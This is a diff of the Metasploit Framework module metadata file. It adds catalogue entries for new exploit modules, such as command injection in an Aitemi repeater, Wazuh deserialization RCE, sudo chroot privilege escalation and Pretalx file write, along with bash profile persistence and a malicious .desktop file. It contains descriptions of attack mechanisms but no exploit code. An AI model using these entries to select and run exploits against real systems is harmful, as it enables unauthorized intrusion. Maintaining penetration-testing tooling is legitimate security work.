    "ref_name": "admin/kerberos/get_ticket",
@@ -12446,7 +12446,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-07 21:38:27 +0000",
+    "mod_time": "2025-08-02 14:18:28 +0000",
    "path": "/modules/auxiliary/analyze/crack_aix.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_aix",
@@ -12463,6 +12463,10 @@
    "session_types": false,
    "needs_cleanup": false,
    "actions": [
+      {
+        "name": "auto",
+        "description": "Auto-selection of cracker"
+      },
      {
        "name": "hashcat",
        "description": "Use Hashcat"
@@ -12498,7 +12502,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-07 21:38:27 +0000",
+    "mod_time": "2025-07-30 14:09:45 +0000",
    "path": "/modules/auxiliary/analyze/crack_databases.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_databases",
@@ -12515,6 +12519,10 @@
    "session_types": false,
    "needs_cleanup": false,
    "actions": [
+      {
+        "name": "auto",
+        "description": "Auto-selection of cracker"
+      },
      {
        "name": "hashcat",
        "description": "Use Hashcat"
@@ -12547,7 +12555,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-07 21:38:27 +0000",
+    "mod_time": "2025-07-30 14:10:03 +0000",
    "path": "/modules/auxiliary/analyze/crack_linux.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_linux",
@@ -12564,6 +12572,10 @@
    "session_types": false,
    "needs_cleanup": false,
    "actions": [
+      {
+        "name": "auto",
+        "description": "Auto-selection of cracker"
+      },
      {
        "name": "hashcat",
        "description": "Use Hashcat"
@@ -12633,7 +12645,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-07 21:38:27 +0000",
+    "mod_time": "2025-07-30 14:10:31 +0000",
    "path": "/modules/auxiliary/analyze/crack_osx.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_osx",
@@ -12650,6 +12662,10 @@
    "session_types": false,
    "needs_cleanup": false,
    "actions": [
+      {
+        "name": "auto",
+        "description": "Auto-selection of cracker"
+      },
      {
        "name": "hashcat",
        "description": "Use Hashcat"
@@ -12678,7 +12694,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-07 21:38:27 +0000",
+    "mod_time": "2025-07-30 14:10:49 +0000",
    "path": "/modules/auxiliary/analyze/crack_webapps.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_webapps",
@@ -12695,6 +12711,10 @@
    "session_types": false,
    "needs_cleanup": false,
    "actions": [
+      {
+        "name": "auto",
+        "description": "Auto-selection of cracker"
+      },
      {
        "name": "hashcat",
        "description": "Use Hashcat"
@@ -12727,7 +12747,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-07 21:38:27 +0000",
+    "mod_time": "2025-07-30 14:11:06 +0000",
    "path": "/modules/auxiliary/analyze/crack_windows.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_windows",
@@ -12744,6 +12764,10 @@
    "session_types": false,
    "needs_cleanup": false,
    "actions": [
+      {
+        "name": "auto",
+        "description": "Auto-selection of cracker"
+      },
      {
        "name": "hashcat",
        "description": "Use Hashcat"
@@ -14090,7 +14114,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-08-01 10:48:54 +0000",
    "path": "/modules/auxiliary/dos/http/apache_range_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/http/apache_range_dos",
@@ -24251,7 +24275,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-07-30 12:13:33 +0000",
+    "mod_time": "2025-08-15 15:34:13 +0000",
    "path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -28097,7 +28121,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-05-28 18:01:32 +0000",
+    "mod_time": "2025-07-19 03:22:12 +0000",
    "path": "/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb",
    "is_install_path": true,
    "ref_name": "gather/wp_depicter_sqli_cve_2025_2011",
@@ -28115,12 +28139,7 @@
    },
    "session_types": false,
    "needs_cleanup": false,
-    "actions": [
-      {
-        "name": "SQLi",
-        "description": "Perform SQL Injection via admin-ajax.php?s="
-      }
-    ]
+    "actions": []
  },
  "auxiliary_gather/wp_photo_gallery_sqli": {
    "name": "WordPress Photo Gallery Plugin SQL Injection (CVE-2022-0169)",
@@ -40851,6 +40870,61 @@
    "needs_cleanup": false,
    "actions": []
  },
+  "auxiliary_scanner/http/pretalx_file_read_cve_2023_28459": {
+    "name": "Pretalx Arbitrary File Read/Limited File Write",
+    "fullname": "auxiliary/scanner/http/pretalx_file_read_cve_2023_28459",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Stefan Schiller",
+      "msutovsky-r7"
+    ],
+    "description": "This module exploits functionality in Pretalx that export conference schedule as zipped file. The Pretalx will iteratively include any file referenced by any HTML tag and does not properly check the path of the file, which can lead to arbitrary file read. The module requires credentials that allow schedule export, schedule release and approval of proposals. Additionally, module requires conference name and URL for media files.",
+    "references": [],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-08-22 15:26:46 +0000",
+    "path": "/modules/auxiliary/scanner/http/pretalx_file_read_cve_2023_28459.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/pretalx_file_read_cve_2023_28459",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
  "auxiliary_scanner/http/prev_dir_same_name_file": {
    "name": "HTTP Previous Directory File Scanner",
    "fullname": "auxiliary/scanner/http/prev_dir_same_name_file",
@@ -47698,7 +47772,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-04-08 18:21:39 +0000",
+    "mod_time": "2025-02-12 17:47:18 +0000",
    "path": "/modules/auxiliary/scanner/ldap/ldap_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ldap/ldap_login",
@@ -53486,7 +53560,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-28 22:15:05 +0000",
+    "mod_time": "2025-09-02 10:05:42 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_router_portscanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_router_portscanner",
@@ -57543,7 +57617,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-02-28 09:35:28 +0000",
+    "mod_time": "2025-09-03 11:08:43 +0000",
    "path": "/modules/auxiliary/scanner/ssl/ssl_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssl/ssl_version",
@@ -67949,6 +68023,64 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/aitemi_m300_time_rce": {
+    "name": "Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (time param)",
+    "fullname": "exploit/linux/http/aitemi_m300_time_rce",
+    "aliases": [],
+    "rank": 400,
+    "disclosure_date": "2025-08-07",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits an unauthenticated remote command injection vulnerability\n          in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02). The vulnerability\n          lies in the 'time' parameter of the time configuration endpoint, which is passed\n          unsanitized to a shell command executed via the `date -s` mechanism. The injection\n          executes with root privileges, without requiring authentication, reboot, or\n          network reconfiguration.",
+    "references": [
+      "URL-https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/",
+      "CVE-2025-34152"
+    ],
+    "platform": "Unix",
+    "arch": "cmd, mipsbe",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Meterpreter MIPSBE (MAY crash HTTP worker)"
+    ],
+    "mod_time": "2025-08-14 16:37:13 +0000",
+    "path": "/modules/exploits/linux/http/aitemi_m300_time_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/aitemi_m300_time_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/alcatel_omnipcx_mastercgi_exec": {
    "name": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",
    "fullname": "exploit/linux/http/alcatel_omnipcx_mastercgi_exec",
@@ -75362,6 +75494,63 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/ictbroadcast_unauth_cookie": {
+    "name": "ICTBroadcast Unauthenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/ictbroadcast_unauth_cookie",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-03-19",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits an unauthenticated remote code execution (RCE) vulnerability\n          in ICTBroadcast. The vulnerability exists in the way session cookies are handled\n          and processed, allowing an attacker to inject arbitrary system commands.",
+    "references": [
+      "URL-https://www.ictbroadcast.com/",
+      "CVE-2025-2611"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command Shell"
+    ],
+    "mod_time": "2025-08-04 17:53:29 +0000",
+    "path": "/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/ictbroadcast_unauth_cookie",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/imperva_securesphere_exec": {
    "name": "Imperva SecureSphere PWS Command Injection",
    "fullname": "exploit/linux/http/imperva_securesphere_exec",
@@ -80696,7 +80885,7 @@
    "fullname": "exploit/linux/http/pandora_fms_auth_netflow_rce",
    "aliases": [],
    "rank": 600,
-    "disclosure_date": "2025-12-30",
+    "disclosure_date": "2025-06-27",
    "type": "exploit",
    "author": [
      "msutovsky-r7"
@@ -80726,7 +80915,7 @@
    "targets": [
      "Linux/Unix Command"
    ],
-    "mod_time": "2025-07-04 08:54:30 +0000",
+    "mod_time": "2025-07-31 12:58:28 +0000",
    "path": "/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/pandora_fms_auth_netflow_rce",
@@ -81044,6 +81233,66 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/pandora_itsm_auth_rce_cve_2025_4653": {
+    "name": "Pandora ITSM authenticated command injection leading to RCE via the backup function",
+    "fullname": "exploit/linux/http/pandora_itsm_auth_rce_cve_2025_4653",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-06-10",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "Pandora ITSM is a platform for Service Management & Support including a Helpdesk for support\n          and customer service teams, aligned with ITIL processes.\n          This module exploits a command injection vulnerability in the `name` backup setting at the\n          application setup page of Pandora ITSM. This can be triggered by generating a backup with a\n          malicious payload injected at the `name` parameter.\n          You need to have admin access at the Pandora ITSM  Web application in order to execute this RCE.\n          This access can be achieved by knowing the admin credentials to access the web application or\n          leveraging a default password vulnerability in Pandora ITSM that allows an attacker to access\n          the Pandora FMS ITSM database, create a new admin user and gain administrative access to the\n          Pandora ITSM Web application. This attack can be remotely executed over the WAN as long as the\n          MySQL services are exposed to the outside world.\n          This issue affects all ITSM Enterprise editions up to `5.0.105` and is patched at `5.0.106`.",
+    "references": [
+      "CVE-2025-4653",
+      "URL-https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/",
+      "URL-https://github.com/h00die-gr3y/h00die-gr3y/security/advisories/GHSA-m4f8-9c8x-8f3f",
+      "URL-https://attackerkb.com/topics/wgCb1QQm1t/cve-2025-4653"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command"
+    ],
+    "mod_time": "2025-08-06 08:22:06 +0000",
+    "path": "/modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/pandora_itsm_auth_rce_cve_2025_4653",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/pandora_ping_cmd_exec": {
    "name": "Pandora FMS Ping Authenticated Remote Code Execution",
    "fullname": "exploit/linux/http/pandora_ping_cmd_exec",
@@ -81808,6 +82057,125 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/pivotx_index_php_overwrite": {
+    "name": "PivotX Remote Code Execution",
+    "fullname": "exploit/linux/http/pivotx_index_php_overwrite",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-07-10",
+    "type": "exploit",
+    "author": [
+      "HayToN",
+      "msutovsky-r7"
+    ],
+    "description": "This module gains remote code execution in PivotX management system. The PivotX allows admin user to directly edit files on the webserver, including PHP files. The module exploits this by writing a malicious payload into `index.php` file, gaining remote code execution.",
+    "references": [
+      "EDB-52361",
+      "URL-https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3",
+      "CVE-2025-52367"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux"
+    ],
+    "mod_time": "2025-08-12 10:42:46 +0000",
+    "path": "/modules/exploits/linux/http/pivotx_index_php_overwrite.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/pivotx_index_php_overwrite",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_linux/http/pretalx_rce_cve_2023_28458": {
+    "name": "Pretalx Limited File Write to Remote Code Execution",
+    "fullname": "exploit/linux/http/pretalx_rce_cve_2023_28458",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2023-03-07",
+    "type": "exploit",
+    "author": [
+      "Stefan Schiller",
+      "msutovsky-r7"
+    ],
+    "description": "This module exploits CVE-2023-28458, a limited file write in Pretalx, up to version 2.3.1. The module will use the vulnerability to write a malicious site-specific configuration hook forPython. Once hook is written, payload will be executed every time Pretalx user runs any Python code. Pretalx needs to run in debug mode to exploit this.",
+    "references": [
+      "URL-https://www.sonarsource.com/blog/pretalx-vulnerabilities-how-to-get-accepted-at-every-conference/",
+      "CVE-2023-28458"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Target"
+    ],
+    "mod_time": "2025-08-22 15:26:46 +0000",
+    "path": "/modules/exploits/linux/http/pretalx_rce_cve_2023_28458.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/pretalx_rce_cve_2023_28458",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/progress_flowmon_unauth_cmd_injection": {
    "name": "Flowmon Unauthenticated Command Injection",
    "fullname": "exploit/linux/http/progress_flowmon_unauth_cmd_injection",
@@ -86761,6 +87129,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/wazuh_auth_rce_cve_2025_24016": {
+    "name": "Wazuh server remote code execution caused by an unsafe deserialization vulnerability.",
+    "fullname": "exploit/linux/http/wazuh_auth_rce_cve_2025_24016",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-02-10",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "DanielFi https://github.com/DanielFi"
+    ],
+    "description": "Wazuh is a free and open source platform used for threat prevention, detection, and response.\n          Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability\n          allows for remote code execution on Wazuh servers. DistributedAPI parameters are serialized\n          as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`).\n          If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can\n          forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code.\n          The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh\n          servers in the cluster) or, in certain configurations, even by a compromised agent.",
+    "references": [
+      "CVE-2025-24016",
+      "URL-https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh",
+      "URL-https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 55000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command"
+    ],
+    "mod_time": "2025-07-30 20:24:56 +0000",
+    "path": "/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/wazuh_auth_rce_cve_2025_24016",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/wd_mycloud_multiupload_upload": {
    "name": "Western Digital MyCloud multi_uploadify File Upload Vulnerability",
    "fullname": "exploit/linux/http/wd_mycloud_multiupload_upload",
@@ -88714,54 +89142,6 @@
    "needs_cleanup": null,
    "actions": []
  },
-  "exploit_linux/local/bash_profile_persistence": {
-    "name": "Bash Profile Persistence",
-    "fullname": "exploit/linux/local/bash_profile_persistence",
-    "aliases": [],
-    "rank": 300,
-    "disclosure_date": "1989-06-08",
-    "type": "exploit",
-    "author": [
-      "Michael Long <bluesentinel@protonmail.com>"
-    ],
-    "description": "This module writes an execution trigger to the target's Bash profile.\n          The execution trigger executes a call back payload whenever the target\n          user opens a Bash terminal. A handler is not run automatically, so you\n          must configure an appropriate exploit/multi/handler to receive the callback.",
-    "references": [
-      "URL-https://attack.mitre.org/techniques/T1156/"
-    ],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2021-12-24 03:06:37 +0000",
-    "path": "/modules/exploits/linux/local/bash_profile_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/bash_profile_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "repeatable-session"
-      ],
-      "Stability": [
-        "crash-safe"
-      ],
-      "SideEffects": [
-        "artifacts-on-disk",
-        "config-changes"
-      ]
-    },
-    "session_types": [
-      "meterpreter",
-      "shell"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
  "exploit_linux/local/blueman_set_dhcp_handler_dbus_priv_esc": {
    "name": "blueman set_dhcp_handler D-Bus Privilege Escalation",
    "fullname": "exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
@@ -90614,6 +90994,55 @@
    "needs_cleanup": null,
    "actions": []
  },
+  "exploit_linux/local/ndsudo_cve_2024_32019": {
+    "name": "Netdata ndsudo privilege escalation",
+    "fullname": "exploit/linux/local/ndsudo_cve_2024_32019",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2024-04-12",
+    "type": "exploit",
+    "author": [
+      "msutovsky-r7",
+      "mia-0"
+    ],
+    "description": "The `ndsudo` is a tool shipped with Netdata Agent. The version v1.45.0 and below contain vulnerability, which allows an attacker to gain privilege escalation using `ndsudo` binary. The vulnerability is untrusted search path, when searching for additional binary files, such as `nvme`. An attacker can create malicious binary with same name and add the directory of this binary into `$PATH` variable. The `ndsudo` will trust the first occurence of this binary and execute it.",
+    "references": [
+      "URL-https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93",
+      "CVE-2024-32019"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2025-08-20 12:49:38 +0000",
+    "path": "/modules/exploits/linux/local/ndsudo_cve_2024_32019.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/ndsudo_cve_2024_32019",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
  "exploit_linux/local/nested_namespace_idmap_limit_priv_esc": {
    "name": "Linux Nested User Namespace idmap Limit Local Privilege Escalation",
    "fullname": "exploit/linux/local/nested_namespace_idmap_limit_priv_esc",
@@ -92120,6 +92549,58 @@
    "needs_cleanup": true,
    "actions": []
  },
+  "exploit_linux/local/sudo_chroot_cve_2025_32463": {
+    "name": "Sudo Chroot 1.9.17 Privilege Escalation",
+    "fullname": "exploit/linux/local/sudo_chroot_cve_2025_32463",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-06-30",
+    "type": "exploit",
+    "author": [
+      "msutovsky-r7",
+      "Stratascale",
+      "Rich Mirch"
+    ],
+    "description": "Sudo before version 1.19.17p1 allows user to use `chroot` option, when\n          executing command. The option is intended to run a command with\n          user-selected root directory (if sudoers file allow it). Change in version\n          1.9.14 allows resolving paths via `chroot` using user-specified root\n          directory when sudoers is still evaluating.\n          This allows the attacker to trick Sudo into loading arbitrary shared object,\n          thus resulting in a privilege escalation.",
+    "references": [
+      "EDB-52352",
+      "URL-https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/",
+      "CVE-2025-32463"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2025-08-27 17:58:11 +0000",
+    "path": "/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/sudo_chroot_cve_2025_32463",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
  "exploit_linux/local/sudoedit_bypass_priv_esc": {
    "name": "Sudoedit Extra Arguments Priv Esc",
    "fullname": "exploit/linux/local/sudoedit_bypass_priv_esc",
@@ -95484,6 +95965,57 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/persistence/bash_profile": {
+    "name": "Bash Profile Persistence",
+    "fullname": "exploit/linux/persistence/bash_profile",
+    "aliases": [
+      "exploits/linux/local/bash_profile_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "1989-06-08",
+    "type": "exploit",
+    "author": [
+      "Michael Long <bluesentinel@protonmail.com>"
+    ],
+    "description": "This module writes an execution trigger to the target's Bash profile.\n          The execution trigger executes a call back payload whenever the target\n          user opens a Bash terminal.\n          Verified on Ubuntu 22.04 and 18.04 desktop with Gnome",
+    "references": [
+      "ATT&CK-T1546.004"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-09 10:02:06 +0000",
+    "path": "/modules/exploits/linux/persistence/bash_profile.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/bash_profile",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
  "exploit_linux/pop3/cyrus_pop3d_popsubfolders": {
    "name": "Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow",
    "fullname": "exploit/linux/pop3/cyrus_pop3d_popsubfolders",
@@ -100823,6 +101355,52 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/fileformat/xdg_desktop": {
+    "name": "Malicious XDG Desktop File",
+    "fullname": "exploit/multi/fileformat/xdg_desktop",
+    "aliases": [],
+    "rank": 500,
+    "disclosure_date": "2007-02-06",
+    "type": "exploit",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module creates a malicious XDG Desktop (.desktop) file.\n\n          On most modern systems, desktop files are not trusted by default.\n          The user will receive a warning prompt that the file is not trusted\n          when running the file, but may choose to run the file anyway.\n\n          The default file manager applications in some desktop environments\n          may impose more strict execution requirements by prompting the user\n          to set the file as executable and/or marking the file as trusted\n          before the file can be executed.",
+    "references": [
+      "ATT&CK-T1204.002",
+      "URL-https://specifications.freedesktop.org/desktop-entry-spec/latest/",
+      "URL-https://specifications.freedesktop.org/desktop-entry-spec/latest/exec-variables.html",
+      "URL-https://wiki.archlinux.org/title/Desktop_entries"
+    ],
+    "platform": "FreeBSD,Linux,Solaris,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-08-04 19:23:02 +0000",
+    "path": "/modules/exploits/multi/fileformat/xdg_desktop.rb",
+    "is_install_path": true,
+    "ref_name": "multi/fileformat/xdg_desktop",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/fileformat/zip_slip": {
    "name": "Generic Zip Slip Traversal Vulnerability",
    "fullname": "exploit/multi/fileformat/zip_slip",
@@ -108515,6 +109093,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/lighthouse_studio_unauth_rce_cve_2025_34300": {
+    "name": "Template Injection Vulnerability in Sawtooth Software's Lighthouse Studio (CVE-2025-34300)",
+    "fullname": "exploit/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-07-16",
+    "type": "exploit",
+    "author": [
+      "Maksim Rogov",
+      "Adam Kues"
+    ],
